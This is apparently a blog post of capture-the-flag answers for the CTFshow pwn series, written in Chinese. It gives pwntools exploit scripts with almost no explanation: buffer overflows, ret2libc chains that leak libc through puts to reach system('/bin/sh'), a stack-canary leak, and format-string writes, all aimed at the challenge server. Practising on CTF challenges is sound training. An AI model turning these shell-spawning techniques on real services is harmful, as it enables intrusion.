CTFshow——Pwn(1)
有点懒不想写write up了。只有exploit。
PWN签到题
from pwn import *
p = remote('xxx',xxx)
p.interactive()
pwn02
from pwn import *
p =remote("pwn.chall.ctf.show",28006)
p.sendline('a'*(0x9+4) + p32(0x0804850F))
p.interactive()
pwn03
from pwn import *
from LibcSearcher import *
p = remote("pwn.chall.ctf.show",28063)
elf = ELF('./stack1')
puts_plt = elf.plt['puts']
puts_got = elf.got['puts']
main = 0x080484DF
payload = 'a' * (9 + 4) + p32(puts_plt) + p32(main) + p32(puts_got)
p.recv()
p.sendline(payload)
puts_addr = u32(p.recv(4))
libc = LibcSearcher('puts', puts_addr)
libc_base = puts_addr - libc.dump('puts')
system = libc_base + libc.dump('system')
binsh = libc_base + libc.dump('str_bin_sh')
payload = 'a' * (9 + 4) + p32(system) + p32(main) + p32(binsh)
p.recv()
p.sendline(payload)
p.interactive()
pwn04
from pwn import *
#p = process('./ex2')
p =remote("pwn.chall.ctf.show",28190)
p.recv()
leak_canary = "%31$x"
p.sendline(leak_canary)
canary = int(p.recv(),16)
print(hex(canary))
getshell = "a" * 100 + p32(canary) + "b" * 12 + p32(0x0804859B)
p.sendline(getshell)
p.interactive()
pwn05
from pwn import *
p = remote("pwn.chall.ctf.show",28041)
flag = 0x08048486
payload = 'a' * (0x14 + 4) + p32(flag)
p.sendline(payload)
p.interactive()
pwn06
glibc2.27版本以上需要栈平衡。rsp % 0x10 == 0.所以加了一个ret保证堆栈平衡。
from pwn import *
#p =remote("pwn.chall.ctf.show",28012)
p = remote('./pwn (1)')
gdb.attach(p, 'b *0x00000000004005B4')
payload = 'a' * (0xc + 8) + p64(0x0400577) + p64(0x0400577)
p.sendline(payload)
p.interactive()
pwn07
from pwn import *
from LibcSearcher import *
elf = ELF('./pwn')
p = remote('pwn.chall.ctf.show',28081)
puts_plt = elf.plt['puts']
puts_got = elf.got['puts']
main = elf.symbols['main']
pop_rdi = 0x00000000004006e3
ret = 0x00000000004004c6
payload = 'a' * (0xc + 0x8) + p64(pop_rdi) + p64(puts_got) + p64(puts_plt) + p64(main)
p.sendline(payload)
p.recvline()
puts_addr = u64(p.recvuntil('\n')[:-1].ljust(8,'\0'))
libc = LibcSearcher('puts', puts_addr)
libc_base = puts_addr - libc.dump('puts')
system = libc_base + libc.dump('system')
binsh = libc_base + libc.dump('str_bin_sh')
payload = 'a' * (0xc + 0x8) + p64(ret) +p64(pop_rdi) + p64(binsh) + p64(system)
p.sendline(payload)
p.interactive()
01栈溢出之ret2text
from pwn import *
p =remote('pwn.chall.ctf.show',28135)
ret = 0x00000000004004fe
payload = 'a' * (0x80 + 8) + p64(ret) +p64(0x000000000400637)
p.sendline(payload)
p.interactive()
pwn10
from pwn import *
p = remote('pwn.chall.ctf.show',28120)
num_addr = 0x0804A030
payload = p32(num_addr) + '%12c%7$n'
p.sendline(payload)
p.interactive()
2a1
# 20.21.2.24还没搞出来。hhhh明天再看看有点困啊